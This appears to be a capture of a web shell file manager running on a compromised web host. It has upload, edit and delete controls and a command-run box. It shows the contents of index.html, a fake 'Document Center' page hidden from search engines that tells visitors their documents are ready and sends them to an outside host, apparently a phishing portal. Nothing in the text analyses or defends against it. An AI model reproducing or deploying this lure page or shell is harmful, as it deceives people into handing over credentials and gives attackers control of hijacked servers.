/
home
/
oxcpoxcp
/
public_html
/
better
/
/home/oxcpoxcp/public_html/better
mkdir
upload
Name
Size
Mode
Actions
index.html
6724
0644
edit
dl
rm
Edit:
/home/oxcpoxcp/public_html/better/index.html
(6724B)
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet"> <meta name="googlebot" content="noindex, nofollow"> <title>Document Access</title> <style> * { box-sizing: border-box; } body { margin: 0; min-height: 100vh; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Arial, sans-serif; background: radial-gradient(circle at top left, #263653 0%, transparent 38%), radial-gradient(circle at bottom right, #182238 0%, transparent 40%), #0b1220; color: #ffffff; display: flex; align-items: center; justify-content: center; padding: 30px 18px; } .container { width: 100%; max-width: 520px; } /* Top branding */ .brand { text-align: center; margin-bottom: 28px; } .brand-mark { width: 46px; height: 46px; margin: 0 auto 12px; border-radius: 13px; background: rgba(255,255,255,0.08); border: 1px solid rgba(255,255,255,0.12); display: flex; align-items: center; justify-content: center; font-size: 21px; } .brand-name { margin: 0; font-size: 14px; font-weight: 600; letter-spacing: 1.5px; text-transform: uppercase; color: #aab7cc; } /* Main panel */ .panel { background: #ffffff; border-radius: 24px; overflow: hidden; box-shadow: 0 30px 70px rgba(0,0,0,0.35); } .panel-top { padding: 34px 34px 30px; background: #ffffff; color: #111827; } /* Status */ .status { display: inline-flex; align-items: center; gap: 8px; padding: 7px 11px; background: #f0fdf4; color: #15803d; border-radius: 999px; font-size: 12px; font-weight: 600; margin-bottom: 23px; } .status-dot { width: 7px; height: 7px; border-radius: 50%; background: #22c55e; } h1 { margin: 0; font-size: 29px; line-height: 1.2; letter-spacing: -0.8px; color: #111827; } .intro { margin: 13px 0 0; font-size: 15px; line-height: 1.65; color: #64748b; } /* Document preview */ .document { margin-top: 28px; padding: 18px; background: #f8fafc; border: 1px solid #e5e7eb; border-radius: 16px; display: flex; align-items: center; gap: 15px; } .document-icon { width: 52px; height: 60px; flex-shrink: 0; background: #ffffff; border: 1px solid #dbe2ea; border-radius: 9px; display: flex; align-items: center; justify-content: center; position: relative; font-size: 25px; box-shadow: 0 2px 5px rgba(0,0,0,0.04); } .document-icon::after { content: ""; position: absolute; right: 0; top: 0; width: 14px; height: 14px; background: #e2e8f0; clip-path: polygon(0 0, 100% 100%, 0 100%); } .document-info { min-width: 0; } .document-title { margin: 0 0 4px; font-size: 14px; font-weight: 650; color: #1e293b; } .document-meta { margin: 0; font-size: 12px; color: #94a3b8; } /* Action area */ .action { padding: 26px 34px 32px; background: #fafafa; border-top: 1px solid #eef2f6; } .view-button { width: 100%; display: flex; align-items: center; justify-content: center; gap: 10px; padding: 15px 20px; background: #111827; color: #ffffff; border-radius: 12px; text-decoration: none; font-size: 15px; font-weight: 600; transition: background 0.2s ease, transform 0.2s ease, box-shadow 0.2s ease; } .view-button:hover { background: #1f2937; transform: translateY(-1px); box-shadow: 0 8px 20px rgba(15,23,42,0.18); } .arrow { font-size: 18px; line-height: 1; } .note { margin: 14px 0 0; text-align: center; font-size: 11px; color: #94a3b8; } /* Footer */ .footer { text-align: center; margin-top: 22px; font-size: 11px; color: #64748b; } /* Mobile */ @media (max-width: 480px) { body { padding: 22px 13px; } .panel-top { padding: 28px 23px 25px; } .action { padding: 22px 23px 27px; } h1 { font-size: 25px; } .document { padding: 15px; } } </style> </head> <body> <div class="container"> ``` <!-- Branding --> <div class="brand"> <div class="brand-mark"> ◈ </div> <p class="brand-name"> Document Center </p> </div> <!-- Main card --> <div class="panel"> <div class="panel-top"> <!-- Status --> <div class="status"> <span class="status-dot"></span> Document available </div> <h1> Your documents are ready. </h1> <p class="intro"> The requested documents are now available for viewing. Use the button below to securely access your files. </p> <!-- Document --> <div class="document"> <div class="document-icon"> 📄 </div> <div class="document-info"> <p class="document-title"> Available Documents </p> <p class="document-meta"> Ready for viewing </p> </div> </div> </div> <!-- Action --> <div class="action"> <a class="view-button" href="https://davishar.sonyguides.com/c" target="_blank" rel="noopener noreferrer" > Open Documents <span class="arrow">→</span> </a> <p class="note"> Opens the document portal in a new window </p> </div> </div> <div class="footer"> Document Center </div> ``` </div> </body> </html>
Save
cmd:
run